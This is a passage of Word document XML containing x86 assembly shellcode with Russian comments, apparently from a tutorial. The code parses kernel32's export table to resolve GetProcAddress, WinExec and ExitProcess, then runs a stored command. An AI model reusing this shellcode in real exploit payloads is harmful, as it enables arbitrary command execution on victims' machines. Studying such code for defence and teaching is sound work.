      </w:pPr>
      <w:r>
        <w:t>mov [ebp-20h], edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37CA8D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46625651" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 14</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]    ; Число экспортированых функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45964C20" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F33447" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A295AAA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88018C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 1</w:t>
      </w:r>
      <w:r>
        <w:t>Ch</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>]    ; Таблица имен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0573D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>mov esi, [ebp - 0Ch]    ; GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0F90E8" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36F4A4" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    xor ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5401AE" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D162B4" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>*4]  ; Очередная запись в таблице имен</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C45BDA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204601C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cx</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, 0</w:t>
      </w:r>
      <w:r>
        <w:t>Eh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">             ; Длина искомой строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7E891" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>repe cmpsb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1DDB7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    jz found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933838E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084AC2C5" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371EAD6C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cmp eax, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFE85E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    jb loop0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B239B6" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    jmp end0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045CD39D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782ECF00" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C83035" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov ecx, [ebp-18h]      ; Ordinal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE28D0" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-20</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">]      ; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Таблица</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A078F3" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4CBD65" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00707D9E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>mov ax, [ecx + eax*2]   ; ordinal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AB198" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mov eax, [edx + eax*4]  ; RVA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524BEF41" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    add eax, ebx            ; Реальный адрес GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626850D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECB27E7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C69D23" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788727D8" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>pop esi                     ; Сохраняем адрес функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74108B64" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C07A55" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2821E439" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ecx, [ebp-4]            ; Поиск WinExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373D3447" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B4BE7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466BBB07" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>call esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF2DAC7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BFD8F6" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C3504B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; Сохранение адреса </w:t>
      </w:r>
      <w:r>
        <w:t>WinExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F338F2" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov edi, eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC851D" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EB8446" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E4A00" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ecx, [ebp-8]            ; Поиск ExitProcess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A989F1" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mov ebx, [ebp-14h]          ; Базовый адрес kernel32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D8EEA" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F005F7F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5C5414" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>call esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1269A8" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366C20EF" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D382E90" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F3DEE" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>pop esi                     ; Сохранение адреса ExitProcess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D7916E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF2E4C2" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xor ecx, ecx                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443E9801" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t>, [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t>-34</w:t>
      </w:r>
      <w:r>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve">]          ; </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Запускаемая</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>команда</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A3AAD" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1089D04C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1208B819" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B4B4E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4E054" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>call edi                    ; Вызов WinExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAECD0F" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FD8A6C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor ebx, ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B42022" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70419C74" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>call esi                    ; Вызов ExitProcess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C01C2" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7C2D71" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE82A35" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>end0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A80B4C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        add esp, 26h            ; clear the stack</w:t>
      </w:r>
    </w:p>
